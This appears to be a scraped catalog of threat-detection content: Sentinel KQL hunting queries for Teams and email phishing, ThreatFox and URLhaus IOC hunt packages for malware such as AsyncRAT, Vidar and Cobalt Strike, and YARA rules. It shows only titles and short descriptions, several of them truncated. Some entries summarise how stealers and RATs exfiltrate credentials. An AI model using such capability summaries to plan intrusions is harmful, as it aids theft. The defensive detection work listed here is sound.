This query helps hunt for Teams messages with Spam threats that have been ZAPed.

huntingmicrosoftofficial
Azure-Sentinel source
T1566
UrlClickEvents

This rule detects and alerts on known threats in Teams messages when a contained domain or URL matches a Microsoft Defender Threat Intelligence indicator (of type 'Domain' or 'URL')

huntingmicrosoftofficial
Azure-Sentinel source
T1566
UrlClickEvents

This query visualizes user clicks in Teams summarizing the data by the various URLs and Click actions on them.

huntingmicrosoftofficial
Azure-Sentinel source
T1566
UrlClickEvents

This query visualizes clicks through actions on Phish or Malware URLs in Teams, summarizing the data by Urls.

huntingmicrosoftofficial
Azure-Sentinel source
T1566
CloudAppEvents

This query visualises the daily amount of user false negative and false positive Teams message submissions.

huntingmicrosoftofficial
Azure-Sentinel source
T1566
UrlClickEvents

This query helps hunt for Teams users clicking on suspicious URL domains.

huntingmicrosoftofficial
ThreatFox: Evilginx IOCs
ioc-hunt high
ThreatFox source
CommonSecurityLogDeviceNetworkEvents

Hunt package for 2 IOCs associated with Evilginx

elf-evilginxiocthreatfox
ThreatFox source
DnsEvents

Hunt package for 27 IOCs associated with ClearFake

iocjs-clearfakethreatfox
ThreatFox: KongTuke IOCs
ioc-hunt high
ThreatFox source
DnsEventsUrlClickEvents

Hunt package for 20 IOCs associated with KongTuke

iocjs-kongtukethreatfox
ThreatFox source
CommonSecurityLogDeviceNetworkEventsDnsEventsUrlClickEvents

Hunt package for 22 IOCs associated with Unknown malware

iocthreatfoxunknown
ThreatFox source
CommonSecurityLogDeviceNetworkEvents

Hunt package for 9 IOCs associated with AdaptixC2

aptiocthreatfoxwin-adaptix_c2
ThreatFox: AsyncRAT IOCs
ioc-hunt high
ThreatFox source
CommonSecurityLogDeviceNetworkEventsDnsEvents

Hunt package for 17 IOCs associated with AsyncRAT

backdooriocthreatfoxwin-asyncrat
ThreatFox source
CommonSecurityLogDeviceNetworkEvents

Cobalt Strike is a penetration testing tool often weaponized for initial access, lateral movement, and command-and-control (C2) communication, leveraging IP

cobalt-strikeiocthreatfoxwin-cobalt_strike
ThreatFox: DCRat IOCs
ioc-hunt high
ThreatFox source
CommonSecurityLogDeviceNetworkEvents

DCRat is a remote access Trojan that enables attackers to exfiltrate data and execute commands on infected systems. It typically arrives via network-based C2 communication through specified IP:port pairs, often leveraging

backdooriocthreatfoxwin-dcrat
ThreatFox: Formbook IOCs
ioc-hunt high
ThreatFox source
DnsEvents

Form

iocthreatfoxwin-formbook
ThreatFox: Havoc IOCs
ioc-hunt high
ThreatFox source
CommonSecurityLogDeviceNetworkEvents

Hunt package for 3 IOCs associated with Havoc

iocthreatfoxwin-havoc
ThreatFox source
UrlClickEvents

The Loki Password Stealer (PWS) is a malware family designed to exfiltrate credentials and sensitive data from infected systems. It typically arrives via phishing emails or malicious URLs that download the payload to compromised endpoints. SOC analysts should monitor for unusual network traffic, lateral movement, and signs of credential dumping beyond the observed URLs.

infostealeriocthreatfoxwin-lokipws
ThreatFox source
DnsEvents

Quasar RAT is a remote access trojan that enables attackers to

backdooriocthreatfoxwin-quasar_rat
ThreatFox: Remcos IOCs
ioc-hunt high
ThreatFox source
CommonSecurityLogDeviceNetworkEventsDnsEvents

Hunt package for 5 IOCs associated with Remcos

iocthreatfoxwin-remcos
ThreatFox: Sliver IOCs
ioc-hunt high
ThreatFox source
CommonSecurityLogDeviceNetworkEvents

Hunt package for 4 IOCs associated with Sliver

iocthreatfoxwin-sliver
ThreatFox source
CommonSecurityLogDeviceNetworkEventsDnsEvents

Hunt package for 3 IOCs associated with ValleyRAT

backdooriocthreatfoxwin-valley_rat
ThreatFox: Vidar IOCs
ioc-hunt high
ThreatFox source
DnsEventsUrlClickEvents

Vidar is a credential-stealing malware that exfiltrates sensitive data via encrypted channels, often targeting banking credentials and system information. It typically arrives through phishing emails containing malicious URLs or via compromised domains

iocthreatfoxwin-vidar
ThreatFox: XWorm IOCs
ioc-hunt high
ThreatFox source
DnsEvents

Hunt package for 2 IOCs associated with XWorm

iocthreatfoxwin-xworm
Azure-Sentinel source
T1566

Top 10 attacked users by Phish messages from external senders using Teams

huntingmicrosoftofficial
Azure-Sentinel source
T1562

This query visualises the overall top 10 external senders sending Teams messages.

huntingmicrosoftofficial
Azure-Sentinel source
T1562

This query looks for the top 10 external senders sending Teams phishing messages.

huntingmicrosoftofficialphishing
Azure-Sentinel source
T1566
CloudAppEvents

This query visualises Teams messages submitted by admins as false negatives, summarizing the data by top 10 sender domains of those messages

huntingmicrosoftofficial
Azure-Sentinel source
T1566
CloudAppEvents

This query visualises Teams messages submitted by users as false negatives or false positives, summarizing the data by top 10 sender domains of those messages

huntingmicrosoftofficial
Azure-Sentinel source
T1566
CloudAppEvents

This query visualises Teams messages submitted by admins as false negatives, summarizing the data by the top 10 individual senders of those messages.

huntingmicrosoftofficial
Azure-Sentinel source
T1566
CloudAppEvents

This query visualises Teams messages submitted by admins as false positives, summarizing the data by the top 10 individual senders of those messages.

huntingmicrosoftofficial
Azure-Sentinel source
T1566
CloudAppEvents

This query visualises Teams messages submitted by users as false negatives or false positives, summarizing the data by top 10 individual senders of those messages

huntingmicrosoftofficial
Azure-Sentinel source
T1566
UrlClickEvents

This query visualizes Top 10 Users clicking on malicious Phish or Malware URLs in Teams.

huntingmicrosoftofficial
Azure-Sentinel source
T1566
CloudAppEvents

This query visualises the top admins performing false negative or false positive admin submissions of Teams messages

huntingmicrosoftofficial
Azure-Sentinel source
T1566
CloudAppEvents

This query visualises the top users performing false negative or false positive user submissions of Teams messages

huntingmicrosoftofficial
Azure-Sentinel source
T1566

This query looks for potential partner compromise by comparing outbound Teams message traffic per target domain with malicious inbound Teams messages from the same domains.

huntingmicrosoftofficial
Azure-Sentinel source
T1566

Top external senders sending malicious inbound Teams messages Spam, Phish, Malware

huntingmicrosoftofficial
Azure-Sentinel source
T1566

Top External Sender domains sending Teams message with Malware threats

huntingmicrosoftofficial
Azure-Sentinel source
T1566

Top External Sender domains sending Teams message with Phish threats

huntingmicrosoftofficial
Azure-Sentinel source
T1566

Top External Sender domains sending Teams message with Spam threats

huntingmicrosoftofficial
Azure-Sentinel source
T1566
UrlClickEvents

This query helps hunt for top malicious URLs clicked by users in Teams

huntingmicrosoftofficial
Azure-Sentinel source
T1566
EmailEvents

This query helps in reviewing top policies for admin overrides (Allow/Block)

huntingmicrosoftofficial
Azure-Sentinel source
T1562

This query visualises the total number of MDO Teams protection detections daily

huntingmicrosoftofficial
Azure-Sentinel source
T1566
UrlClickEvents

This query visualizes URL clicks on URLs in Teams messages which were acted on by ZAP.

huntingmicrosoftofficial
URLhaus source
CommonSecurityLogDnsEvents

Hunt package for 14 malicious URLs tagged as 32-bit

iocurlhaus
URLhaus source
CommonSecurityLogDnsEvents

Hunt package for 10 malicious URLs tagged as arm

iocurlhaus
URLhaus source
CommonSecurityLogDnsEvents

Hunt package for 77 malicious URLs tagged as ClearFake

iocurlhaus
URLhaus source
CommonSecurityLogDnsEvents

Hunt package for 18 malicious URLs tagged as elf

iocurlhaus
URLhaus source
CommonSecurityLogDnsEvents

Hunt package for 5 malicious URLs tagged as malware_download

iocurlhaus
URLhaus source
CommonSecurityLogDnsEvents

Hunt package for 3 malicious URLs tagged as mirai

iocurlhaus
URLhaus source
CommonSecurityLogDnsEvents

Hunt package for 5 malicious URLs tagged as Mozi

iocurlhaus
URLhaus source
CommonSecurityLogDnsEvents

Hunt package for 2 malicious URLs tagged as sh

iocurlhaus
XDP embedded PDF
yara low
Yara-Rules source

YARA rule: XDP_embedded_PDF

community
APT OLE JSRat
yara low
Yara-Rules source

YARA rule: APT_OLE_JSRat

aptbackdoorcommunityole_jsrat
Azure-Sentinel source
T1562
CloudAppEvents

This query detects changes to blocked Teams domains.

huntingmicrosoftofficial
Azure-Sentinel source
T1562
CloudAppEvents

This query detects changes to blocked Teams domains and can be used as an NRT detection.

huntingmicrosoftofficial
Azure-Sentinel source
T1204
CloudAppEvents

In this query, we are looking for emails containing malware accessed on an unmanaged device

huntingmicrosoftofficial
Azure-Sentinel source
T1534
EmailAttachmentInfoEmailEvents

In this query, we are looking for emails containing a malware attachment sent by an internal sender

huntingmicrosoftofficial
Azure-Sentinel source
T1566
EmailAttachmentInfoEmailEvents

This query helps review email malware detection cases

huntingmicrosoftofficial
Azure-Sentinel source
T1566
EmailEvents

This query visualises total inbound emails with Malware detections summarizing the data by the top email sender P2 domain (SenderFromDomain)

huntingmicrosoftofficial
Azure-Sentinel source
T1566

This query helps hunt for recipients of Teams messages.

backdoorhuntingmicrosoftofficial
Azure-Sentinel source
T1566

This query helps hunt for external malicious Teams messages sent from internal senders

huntingmicrosoftofficial
Azure-Sentinel source
T1566
CloudAppEvents

This query visualises total Malware detections of files located on SharePoint, OneDrive and Teams over time summarizing the data by the various Malware families detected focusing on built-in SharePoin

huntingmicrosoftofficial
Azure-Sentinel source
T1566
CloudAppEvents

This query visualises total Malware detections of files located on SharePoint, OneDrive and Teams over time summarizing the data by the various Malware families detected focusing on Defender for Offic

huntingmicrosoftofficial
Azure-Sentinel source
T1566
CloudAppEvents

This query visualises total files located on SharePoint, OneDrive and Teams with Malware detections over time summarizing the data daily.

huntingmicrosoftofficial
Azure-Sentinel source
T1566T1078
AlertEvidenceCloudAppEvents

Correlates Microsoft Teams message activity with downstream Defender alerts on the recipient (victim) identity, surfacing potential phishing or social-engineering chats that are followed by alert acti

huntingmicrosoftofficialphishing
Azure-Sentinel source
T1566
UrlClickEvents

This query helps hunt for Teams messages with malicious URLs based on external Threat Intelligence source

huntingmicrosoftofficial
Azure-Sentinel source
T1566T1219
DeviceProcessEvents

Correlates inbound Microsoft Teams messages with subsequent execution of common Remote Monitoring and Management (RMM) tools (QuickAssist, AnyDesk, TeamViewer) on the recipient's device within a shor

huntingmicrosoftofficial
Azure-Sentinel source
T1562

This query helps review the volume of inbound external Teams messages by sender domain

huntingmicrosoftofficial
Azure-Sentinel source
T1562

This query helps review malicious Teams message detections by URL detection method

huntingmicrosoftofficial
Azure-Sentinel source
T1566

This query helps hunt for malicious Teams messages received from external senders.

huntingmicrosoftofficial
Azure-Sentinel source
T1566
EmailEvents

This query visualises total emails with Malware detections over time summarizing the data daily by Delivery Location.

huntingmicrosoftofficial
Azure-Sentinel source
T1566
EmailEvents

This query visualises total emails with Malware detections summarizing the data by various Malware detection technologies/controls.

huntingmicrosoftofficial
Azure-Sentinel source
T1566
EmailEvents

This query visualises total emails with Malware detections over time summarizing the data daily by various Malware detection technologies/controls.

huntingmicrosoftofficial
Azure-Sentinel source
T1566
CloudAppEvents

This query visualises the amount of total Malware detections of files located on SharePoint, OneDrive and Teams, summarizing by the locations they are stored

huntingmicrosoftofficial
Azure-Sentinel source
T1566
CloudAppEvents

This query visualises the amount of total Malware detections of files located on SharePoint, OneDrive and Teams, summarizing by the workload in which they are stored

huntingmicrosoftofficial
Azure-Sentinel source
T1566
EmailEvents

This query visualises total emails with Malware detections over time summarizing the data daily.

huntingmicrosoftofficial
Azure-Sentinel source
T1566
AlertEvidence

Use AlertInfo and AlertEvidence to collect general information and clickable links to more IOCs about suspicious external Teams messages.

huntingmicrosoftofficial
Azure-Sentinel source
T1566
CloudAppEvents

This query visualises the number of unique accounts performing Teams message admin submissions as false negatives or false positives

huntingmicrosoftofficial
Azure-Sentinel source
T1566
CloudAppEvents

This query visualises the number of unique accounts performing Teams message user submissions as false negatives or false positives

huntingmicrosoftofficial
Azure-Sentinel source
T1562

This query can be used as a Custom Detection Rule (CDR) to trigger when a partner email domain or email address is used in the sender display name of an inbound external Teams message

huntingmicrosoftofficial
Azure-Sentinel source
T1566
CloudAppEventsDeviceProcessEvents

This query looks for possible Teams phishing activity.

huntingmicrosoftofficialphishing
Azure-Sentinel source
T1566
UrlClickEvents

This query provides insights on a potentially malicious URL click in Teams

huntingmicrosoftofficial
Azure-Sentinel source
T1566T1204
UrlClickEvents

Detects rare domains (seen in fewer than 3 Teams messages) appearing in external Microsoft Teams threads within the last 24 hours.

huntingmicrosoftofficial
Yara-Rules source

Detects RTF files

community
Azure-Sentinel source
T1566
EmailEvents

This query visualises emails with Spam detections (High confidence) summarizing the data by Delivery Location.

huntingmicrosoftofficial
Azure-Sentinel source
T1566
EmailEvents

This query visualises emails with Spam detections (Normal confidence) summarizing the data by Delivery Location.

huntingmicrosoftofficial
Azure-Sentinel source
T1566

This query helps hunt for communication from suspicious external users.

huntingmicrosoftofficial
Azure-Sentinel source
T1566

This query helps hunt for communication with suspicious external users.

huntingmicrosoftofficial
ThreatFox: Kimwolf IOCs
ioc-hunt high
ThreatFox source
CommonSecurityLogDeviceNetworkEvents

Hunt package for 7 IOCs associated with Kimwolf

apk-kimwolfiocthreatfox
ThreatFox: Evilginx IOCs
ioc-hunt high
ThreatFox source
CommonSecurityLogDeviceNetworkEvents

Hunt package for 2 IOCs associated with Evilginx

elf-evilginxiocthreatfox
ThreatFox source
DnsEvents

Hunt package for 3 IOCs associated with ClearFake

iocjs-clearfakethreatfox
ThreatFox: KongTuke IOCs
ioc-hunt high
ThreatFox source
DnsEventsUrlClickEvents

Hunt package for 20 IOCs associated with KongTuke

iocjs-kongtukethreatfox
ThreatFox source
CommonSecurityLogDeviceNetworkEventsDnsEvents

Hunt package for 8 IOCs associated with Unknown malware

iocthreatfoxunknown
ThreatFox source
CommonSecurityLogDeviceNetworkEvents

Hunt package for 3 IOCs associated with AdaptixC2

aptiocthreatfoxwin-adaptix_c2
ThreatFox: AsyncRAT IOCs
ioc-hunt high
ThreatFox source
CommonSecurityLogDeviceNetworkEventsDnsEvents

Hunt package for 19 IOCs associated with AsyncRAT

backdooriocthreatfoxwin-asyncrat
ThreatFox source
CommonSecurityLogDeviceNetworkEvents

Hunt package for 5 IOCs associated with Cobalt Strike

cobalt-strikeiocthreatfoxwin-cobalt_strike
ThreatFox: DCRat IOCs
ioc-hunt high
ThreatFox source
CommonSecurityLogDeviceNetworkEvents

DCRat is a

backdooriocthreatfoxwin-dcrat
ThreatFox: Havoc IOCs
ioc-hunt high
ThreatFox source
CommonSecurityLogDeviceNetworkEvents

Hunt package for 2 IOCs associated with Havoc

iocthreatfoxwin-havoc
ThreatFox source
DnsEvents

Hunt package for 3 IOCs associated with Nanocore RAT

backdooriocthreatfoxwin-nanocore
ThreatFox source
CommonSecurityLogDeviceNetworkEvents

Hunt package for 3 IOCs associated with NetSupportManager RAT

backdooriocthreatfoxwin-netsupportmanager_rat
ThreatFox source
DnsEvents

Quasar RAT is a remote access trojan that enables attackers to execute commands, steal data, and

backdooriocthreatfoxwin-quasar_rat
ThreatFox source
CommonSecurityLogDeviceNetworkEvents

Hunt package for 2 IOCs associated with RansomHub

iocransomwarethreatfoxwin-ransomhub
ThreatFox: Remcos IOCs
ioc-hunt high
ThreatFox source
CommonSecurityLogDeviceNetworkEvents

Hunt package for 6 IOCs associated with Remcos

iocthreatfoxwin-remcos
ThreatFox: Vidar IOCs
ioc-hunt high
ThreatFox source
CommonSecurityLogDeviceNetworkEventsDnsEventsUrlClickEvents

Hunt package for 121 IOCs associated with Vidar

iocthreatfoxwin-vidar
ThreatFox: XWorm IOCs
ioc-hunt high
ThreatFox source
CommonSecurityLogDeviceNetworkEventsDnsEvents

Hunt package for 3 IOCs associated with XWorm

iocthreatfoxwin-xworm
Azure-Sentinel source
T1566
EmailEvents

This query helps review the top 100 malicious senders

huntingmicrosoftofficial
Top 100 senders
kql medium
Azure-Sentinel source
T1566
EmailEvents

This query helps review the top 100 senders in your organization in the last 30 days

huntingmicrosoftofficial
Azure-Sentinel source
T1566
EmailEvents

This query visualises total emails with Malware detections summarizing the data by ThreatNames of the malware detected.

huntingmicrosoftofficial
Azure-Sentinel source
T1566
EmailEvents

This query visualises total inbound emails with Malware detections summarizing the data by the top recipient email address (RecipientEmailAddress)

huntingmicrosoftofficial
URLhaus source
CommonSecurityLogDnsEvents

The "

iocurlhaus
URLhaus source
CommonSecurityLogDnsEvents

Hunt package for 18 malicious URLs tagged as arm

iocurlhaus
URLhaus source
CommonSecurityLogDnsEvents

Hunt package for 10 malicious URLs tagged as botnetdomain

iocurlhaus
URLhaus source
CommonSecurityLogDnsEvents

Hunt package for 2 malicious URLs tagged as ClearFake

iocurlhaus
URLhaus source
CommonSecurityLogDnsEvents

Hunt package for 26 malicious URLs tagged as elf

iocurlhaus
URLhaus source
CommonSecurityLogDnsEvents

Hunt package for 3 malicious URLs tagged as opendir

iocurlhaus
URLhaus source
CommonSecurityLogDnsEvents

Hunt package for 4 malicious URLs tagged as powershell

iocpowershellurlhaus
URLhaus source
CommonSecurityLogDnsEvents

Hunt package for 61 malicious URLs tagged as ua-wget

iocurlhaus
Azure-Sentinel source
T1566
EmailEvents

This query visualises total emails with Malware detections over time summarizing the data daily by Malware detection technologies/controls used for detecting unknown-unique malware.

huntingmicrosoftofficial
Zero day threats
kql medium
Azure-Sentinel source
T1566
EmailEvents

This query helps review zero-day threats via URL and file detonations

huntingmicrosoftofficial
Azure-Sentinel source
T1078
CloudAppEvents

This query helps report on who Previewed/Downloaded email messages using the Email entity page in Defender for Office 365

huntingmicrosoftofficial
Azure-Sentinel source
T1566
EmailEvents

This query helps hunt for automated email notifications and suspicious sign-in activity

huntingmicrosoftofficial
Azure-Sentinel source
T1566
EmailEvents

This query visualises bad traffic (% of emails with threats) compared to total inbound emails over time summarising the data daily.

huntingmicrosoftofficial
Azure-Sentinel source
T1021
CloudAppEvents

This query helps hunt for BEC - File sharing tactics - Dropbox

huntingmicrosoftofficial
Azure-Sentinel source
T1021
CloudAppEvents

This query helps hunt for BEC - File sharing tactics - OneDrive or SharePoint

huntingmicrosoftofficial
blackhole basic
yara low
Yara-Rules source

The 'blackhole_basic' YARA rule detects indicators

community
Azure-Sentinel source
T1566
CloudAppEventsEmailEvents

This query helps calculate the overall efficacy of MDO based on threats that were blocked pre-delivery, cleaned up post-delivery, or left uncaught.

huntingmicrosoftofficial
Azure-Sentinel source
T1566
EmailEvents

This query helps review malicious email detections by detection method

huntingmicrosoftofficial
Azure-Sentinel source
EmailEvents

This query helps review recipients who are potential victims of email bombing attacks

huntingmicrosoftofficial
Azure-Sentinel source
T1566
EmailEvents

This query helps get GeoIP information for the SenderIPv4 addresses of emails.

huntingmicrosoftofficial
Azure-Sentinel source
T1566
EmailUrlInfo

This query helps hunt for emails containing links to IP addresses

huntingmicrosoftofficial
Azure-Sentinel source
T1566
EmailEvents

This query helps hunt for good emails from senders with bad patterns

huntingmicrosoftofficial
Azure-Sentinel source
T1078
CloudAppEventsEmailEvents

This query helps report on email access by administrators

backdoorhuntingmicrosoftofficial
Azure-Sentinel source
T1566
EmailEvents

This query helps to hunt for possible email bombing attacks in Microsoft Defender for Office 365.

huntingmicrosoftofficial
Azure-Sentinel source
T1566
EmailEvents

This query helps hunt for email conversation take-over attempts

huntingmicrosoftofficial
Azure-Sentinel source
T1566
EmailAttachmentInfo

This query helps hunt for emails with malicious attachments based on SHA256 hashes from an external IOC source

huntingmicrosoftofficial
Azure-Sentinel source
T1566
EmailEventsEmailUrlInfo

This query helps hunt for emails with malicious URLs based on an external IOC source

huntingmicrosoftofficial
Azure-Sentinel source
T1562
CloudAppEvents

This query helps hunt for Tenant allow/block list (TABL) changes in Defender for Office 365

huntingmicrosoftofficial
Azure-Sentinel source
T1098
CloudAppEvents

This query helps hunt for inbox rule changes which forward or redirect email

huntingmicrosoftofficial
Azure-Sentinel source
T1566
EmailEvents

Advanced Hunting uses UTC as its default time zone. Filters in Advanced Hunting also work in UTC by default, whereas query results are shown in local time if the user has selected a local time zone in securit

huntingmicrosoftofficial
Mail item accessed
kql medium
Azure-Sentinel source
T1566
CloudAppEvents

This query helps review emails accessed by end users using cloud app events data

huntingmicrosoftofficial
Azure-Sentinel source
T1566
EmailEvents

This query helps review mail that is likely a reply, but where there is no history of the people chatting and the domain is new

huntingmicrosoftofficial
Azure-Sentinel source
T1566
EmailEvents

This query helps review inbound / outbound / intra-org emails by domain per day

huntingmicrosoftofficial
Azure-Sentinel source
T1566
EmailEvents

This query helps hunt for emails from a sender with at least one email in quarantine

huntingmicrosoftofficial
Azure-Sentinel source
T1566
EmailEvents

This query helps review Malware, Phishing and Spam emails caught per day

huntingmicrosoftofficialphishing
Azure-Sentinel source
T1566
AlertEvidenceCloudAppEventsEmailEvents

This query helps report daily on the total number of emails and the total number of emails detected by Defender for Office 365

huntingmicrosoftofficial
Azure-Sentinel source
T1566
CloudAppEventsEmailEvents

Graph of MDO detections trended over time

huntingmicrosoftofficial
Azure-Sentinel source
T1566
EmailEvents

This query can be used as a Custom Detection Rule (CDR) to trigger when a potentially malicious email appears to come from an Accepted Domain but DMARC returned a (transient) TempError result.

huntingmicrosoftofficial
Azure-Sentinel source
T1566
EmailEventsEmailUrlInfo

This query can be used as a Custom Detection Rule (CDR) to trigger when a potentially malicious email with a URL from OpenPhish was delivered to Inbox

huntingmicrosoftofficial
New TABL Items
kql medium
Azure-Sentinel source
T1562
CloudAppEvents

This query helps identify when new items are added to the Tenant Allow/Block List (TABL) in Defender for Office 365.

huntingmicrosoftofficial
Azure-Sentinel source
T1566
EmailEventsEmailUrlInfo

This query can be used as a Custom Detection Rule (CDR) to trigger when a potentially malicious OAuth app URL has been delivered into an Inbox.

huntingmicrosoftofficialphishing
Azure-Sentinel source
T1566
EmailAttachmentInfoEmailEvents

This query can be used as a Custom Detection Rule (CDR) to trigger when a potentially malicious .SVG file has been delivered into an Inbox.

huntingmicrosoftofficial
Azure-Sentinel source
T1566
EmailEvents

This query helps in checking the sender-recipient contact establishment status

huntingmicrosoftofficial
ThreatFox: Kimwolf IOCs
ioc-hunt high
ThreatFox source
CommonSecurityLogDeviceNetworkEvents

Hunt package for 30 IOCs associated with Kimwolf

apk-kimwolfiocthreatfox
ThreatFox source
DnsEvents

Hunt package for 184 IOCs associated with ClearFake

iocjs-clearfakethreatfox
ThreatFox source
CommonSecurityLogDeviceNetworkEvents

Hunt package for 3 IOCs associated with Unknown malware

iocthreatfoxunknown
ThreatFox: AsyncRAT IOCs
ioc-hunt high
ThreatFox source
CommonSecurityLogDeviceNetworkEventsDnsEvents

Hunt package for 5 IOCs associated with AsyncRAT

backdooriocthreatfoxwin-asyncrat
ThreatFox source
CommonSecurityLogDeviceNetworkEventsDnsEvents

Hunt package for 2 IOCs associated with Cobalt Strike

cobalt-strikeiocthreatfoxwin-cobalt_strike
ThreatFox source
DnsEvents

The Lumma Stealer malware is a data-exfiltration tool designed to steal sensitive information such as credentials

infostealeriocthreatfoxwin-lumma
ThreatFox source
CommonSecurityLogDeviceNetworkEvents

Hunt package for 5 IOCs associated with Meterpreter

iocthreatfoxwin-meterpreter
ThreatFox source
UrlClickEvents

Hunt package for 3 IOCs associated with Nanocore RAT

backdooriocthreatfoxwin-nanocore
ThreatFox source
CommonSecurityLogDeviceNetworkEvents

Hunt package for 3 IOCs associated with NetSupportManager RAT

backdooriocthreatfoxwin-netsupportmanager_rat
ThreatFox source
CommonSecurityLogDeviceNetworkEvents

Hunt package for 2 IOCs associated with RansomHub

iocransomwarethreatfoxwin-ransomhub
ThreatFox: Vidar IOCs
ioc-hunt high
ThreatFox source
DnsEvents

Hunt package for 87 IOCs associated with Vidar

iocthreatfoxwin-vidar
ThreatFox: VShell IOCs
ioc-hunt high
ThreatFox source
CommonSecurityLogDeviceFileEventsDeviceNetworkEventsUrlClickEvents

Hunt package for 3 IOCs associated with VShell

iocthreatfoxwin-vshell
Azure-Sentinel source
T1566
EmailEvents

Identifies the top 10 sender domains delivering inbound emails classified as malware, phishing, or spam. Based on Defender for Office 365 workbook: https://techcommunity.microsoft.com/blog/microsoftde

huntingmicrosoftofficialphishing
Azure-Sentinel source
T1566
EmailEvents

Identifies the top 10 external sender addresses delivering inbound emails classified as malware. If you want to exclude your own organization's domains (including subdomains), add a filter after the m

huntingmicrosoftofficial
Azure-Sentinel source
T1566
EmailEvents

Identifies the top 10 external sender addresses delivering inbound emails classified as phishing. If you want to exclude your own organization's domains (including subdomains), add a filter after the

huntingmicrosoftofficialphishing
Azure-Sentinel source
T1566
EmailEvents

Identifies the top 10 external sender addresses delivering inbound emails classified as spam. If you want to exclude your own organization's domains (including subdomains), add a filter after the spam

huntingmicrosoftofficial
Azure-Sentinel source
T1566
EmailEvents

Identifies the top 10 users receiving inbound emails classified as malware, phishing, or spam. Based on concepts from the Defender for Office 365 solution in Sentinel: https://techcommunity.microsoft.

huntingmicrosoftofficialphishing
Azure-Sentinel source
T1566
UrlClickEvents

Visualises the top 10 users with click attempts on URLs in emails detected as malware, phishing, or spam, helping analysts identify risky user behaviour and potential targets. Based on Defender for Of

huntingmicrosoftofficialphishing
Azure-Sentinel source
T1566
EmailEvents

This query helps hunt for the top outbound recipient domains which are also sending inbound emails with threats

huntingmicrosoftofficial
Azure-Sentinel source
T1566
CloudAppEventsEmailEvents

Provides a summary of total number of detections

huntingmicrosoftofficial
URLhaus source
CommonSecurityLogDnsEvents

Hunt package for 26 malicious URLs tagged as 32-bit

iocurlhaus
URLhaus source
CommonSecurityLogDnsEvents

Hunt package for 13 malicious URLs tagged as apk

iocurlhaus
URLhaus source
CommonSecurityLogDnsEvents

The "arm" malware family is designed to exfiltrate sensitive data and establish persistence within infected systems. It typically arrives via phishing

iocurlhaus
URLhaus source
CommonSecurityLogDnsEvents

Hunt package for 39 malicious URLs tagged as c2-monitor-auto

iocurlhaus
URLhaus source
CommonSecurityLogDnsEvents

Hunt package for 74 malicious URLs tagged as ClearFake

iocurlhaus
URLhaus source
CommonSecurityLogDnsEvents

Hunt package for 9 malicious URLs tagged as elf

iocurlhaus
URLhaus source
CommonSecurityLogDnsEvents

The "jar" malware family is a Java-based downloader that establishes command-and-control (C2) communication to exfiltrate data and execute arbitrary

iocurlhaus
Yara-Rules source

Yara rule for Banking trojan targeting South Korean banks

backdoorcommunity
Yara-Rules source

Angler Exploit Kit Redirector

communityexploit
Azure-Sentinel source
T1562
CloudAppEvents

This query displays the configuration auditing for 'Safe Attachments for SharePoint, OneDrive, and Microsoft Teams' and 'Safe Documents' in Microsoft Defender for Office 365.

backdoorhuntingmicrosoftofficial
Yara-Rules source

Detects scam emails with phishing attachment.

communityphishing
Azure-Sentinel source
T1566
EmailEvents

This query helps review the authentication failure count by authentication type. Update the authentication type below to DMARC, DKIM, SPF or CompAuth

huntingmicrosoftofficial
Azure-Sentinel source
DeviceFileEvents

Identifies browser extension CRX files observed across endpoints. Helps in enumerating commonly installed extensions and hunting for potentially malicious ones. --- Optional Enrichment: To enrich th

backdoorhuntingmicrosoftofficial
Azure-Sentinel source
T1566
EmailEvents

This query visualises total emails with Spoof - Composite Authentication fails summarizing the data daily.

huntingmicrosoftofficial
Azure-Sentinel source

Find devices connected to a monitored network. Please note that line 5 needs to have a monitored network name put in place, or be commented out to pull everything.

huntingmicrosoftofficial
Yara-Rules source

Detects scam emails with phishing attachment.

communityphishing
Yara-Rules source

YARA rule: CryptoWall_Resume_phish

community
davivienda
yara low
Yara-Rules source

The 'dav

community
Azure-Sentinel source
DeviceFileEventsDeviceProcessEvents

This query was originally published in the threat analytics report, Operation Soft Cell. Operation Soft Cell is a series of campaigns targeting users' call logs at telecommunications providers through

backdoorhuntingmicrosoftofficial
Azure-Sentinel source
IdentityLogonEvents

// Detect Active Directory service accounts that are not active because their last logon was more than 14 days ago // Replace XXX on line 4 with the naming convention start of your Active Directory se

huntingmicrosoftofficial
Azure-Sentinel source
DeviceProcessEvents

This query was originally published in the threat analytics report, Operation Soft Cell. Operation Soft Cell is a series of campaigns targeting users' call logs at telecommunications providers through

backdoorhuntingmicrosoftofficial
Azure-Sentinel source
DeviceNetworkEvents

This advanced hunting query detects processes communicating with known Tor relay IP addresses. The public URL in the query is updated daily at 12PM and 12AM UTC. CSV source is the Tor Project API, obt

huntingmicrosoftofficial
DetectTorrentUse
kql medium
Azure-Sentinel source
DeviceNetworkEvents

Custom detection to find use of torrenting software or browsing related to torrents.

huntingmicrosoftofficial
Azure-Sentinel source
DeviceNetworkEvents

Looking for high-volume queries against a given RemoteIP, per DeviceName, RemotePort and Process. Please change the Timestamp window according to your preference/objective, as well as the subnet ranges that

huntingmicrosoftofficial
DKIM Failure Trend
kql medium
Azure-Sentinel source
T1566
EmailEvents

This query visualises total emails with Spoof - DKIM fails summarizing the data daily.

huntingmicrosoftofficial
DMARC Failure Trend
kql medium
Azure-Sentinel source
T1566
EmailEvents

This query visualises total emails with Spoof - DMARC fails summarizing the data daily.

huntingmicrosoftofficial
docx macro
yara low
Yara-Rules source

YARA rule: docx_macro

community
doppelpaymer
kql medium
Azure-Sentinel source
DeviceProcessEvents

This query was originally published in the threat analytics report, Doppelpaymer: More human-operated ransomware. There is also a related blog. DoppelPaymer is ransomware that is spread manually by hu

backdoorcredential-thefthuntingmicrosoftofficialransomware
dropper
yara low
Yara-Rules source

YARA rule: dropper

community
Yara-Rules source

This rule detects mapin dropper files

community
Yara-Rules source

YARA rule: Email_Generic_Phishing

communityphishing
Yara-Rules source

The 'Email_quota_limit_warning' rule detects emails indicating a user has exceeded their email storage quota, often used by attackers to mask malicious activity. SOC teams should deploy this rule in email gateways and endpoint EDR solutions to identify potential phishing or malware distribution attempts.

community
Yara-Rules source

Detects a possible .eml used in the Ukraine BE power attack

community
Yara-Rules source

Detects a possible .eml used in the Ukraine BE power attack

community
Azure-Sentinel source
T1566
EmailEvents

This query detects delivered phishing emails where the Sender is empty based on recently observed campaigns.

huntingmicrosoftofficialphishing
Azure-Sentinel source
DeviceProcessEvents

The query finds attempts to list users or groups using Net commands.

backdoorhuntinglateral-movementmicrosoftofficial
Yara-Rules source

Detects the possible extortion scam on the basis of subjects and keywords

community
Yara-Rules source

YARA rule: Fake_it_maintenance_bulletin

community
Azure-Sentinel source
